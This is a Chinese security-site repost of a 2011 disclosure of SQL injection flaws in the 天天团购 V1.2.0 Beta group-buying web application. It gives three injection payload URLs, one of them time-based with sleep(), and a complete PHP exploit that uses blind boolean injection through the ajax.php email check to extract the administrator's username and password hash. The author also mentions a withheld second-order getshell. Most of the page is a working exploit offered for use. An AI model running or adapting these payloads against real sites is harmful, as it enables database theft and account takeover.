首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
天天团购 V1.2.0 Beta SQL injection
来源:http://bbs.wolvez.org 作者:k4shifz 发布时间:2011-02-21  

这套程序注射颇多,过滤上有些混乱,漏过许多变量。mysql类没有调用mysql_error等函数,报错没成功。挑几个:

 
\modules\ajax\check.mod.php  40 or 63 ::: urldecode -->' bypass gpc
http://localhost/ttTuangou/ajax.php?mod=check&code=email&email=%2527 or 1=2%23

\modules\index.mod.php   542
http://localhost/ttTuangou/?mod=index&code=expressconfirm&id=0 or if(1,sleep(3),1) or 1=2%23

\modules\index.mod.php   189
http://localhost/ttTuangou/?mod=index&code=order&orderid=0 or 1=1%23

还有不少,特别是几个支付文件中的类。
exp:

<?php 
set_time_limit(0);error_reporting(0);
echo " by k4shifz\n http://bbs.wolvez.org\n";
$host='localhost';
$path='tttuangou';

$length=$name=$pass=$t1=$t2=$low=$high=$mid='';

/*********************Start*************************/
$t1=time();
for($v=1;$v<30;$v++)
{
    if(http_send(0,0,'='.$v)) 
    {
        $length=$v;break;
    }
}
if(!$length) exit("\nFailed , Maybe the table prefix isn't `cenwor_`\n");


for($v=1;$v<($length+1);$v++)
{
    for($low=33,$high=127;$low<=$high;)
    {
        $mid=(int)(($low+$high)/2);
        if(http_send(1,$v,'='.$mid))
        {
            $name .= chr($mid);
            break;
        }
        if(http_send(1,$v,'<'.$mid))
        {
            $high = $mid;
        }
        else
        {
            $low = $mid;
        }
    }
}

for($v=1;$v<33;$v++)
{
    for($low=48,$high=103;$low<=$high;)
    {
        $mid=(int)(($low+$high)/2);
        if(http_send(2,$v,'='.$mid))
        {
            $pass .= chr($mid);
            break;
        }
        if(http_send(2,$v,'<'.$mid))
        {
            $high = $mid;
        }
        else
        {
            $low = $mid;
        }
    }
}
$t2=time();

echo "\n{$name}:{$pass}\nuse ".($t2-$t1)." s\n";

/**********************Function************************/
function http_send($i=0,$n=1,$ascii=1)
{
    global $host,$path;
    switch($i)
    {
        case 0:
            $cmd='(SELECT%20length(username)%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
            break;
        case 1:
            $cmd='(SELECT%20ascii(mid(username,'.$n.',1))%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
            break;
        case 2:
            $cmd='(SELECT%20ascii(mid(password,'.$n.',1))%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
            break;
    }
    $fs=fsockopen($host,80);
    fputs($fs,"GET /{$path}/ajax.php?mod=check&code=email&email=%2527%20or%20{$cmd}%23 HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nHost: {$host}\r\n\r\n");
    while(!feof($fs))
        $data .= fread($fs,1024);
    fclose($fs);
    if(substr($data,-1,1)==1)
        return 1;
    else
        return 0;
}

?>

后台不太好拿shell,没有编辑模板、脚本的地方,模板是钉死的。但是有一处二次攻击可以getshell,暂时掖起来了。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·DISCUZX1.5 本地文件包含漏洞
·php168 v6~v7鸡肋Getshell安全问
·GnuBoard本地文件包含漏洞
·皮皮播放器ActiveX控件PlayURLWi
·皮皮播放器ActiveX控件 PlayURL
·无忧购物系统ASP时尚版存在后门
·plesk panel 虚拟主机管理平台 0
·入侵网站的经验
·boblog任意变量覆盖漏洞
·discuz 7.2的漏洞及修复方法
·Diy-Page v8.2 两个注入漏洞分析
·ecshop支付漏洞最新可用EXP利用
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved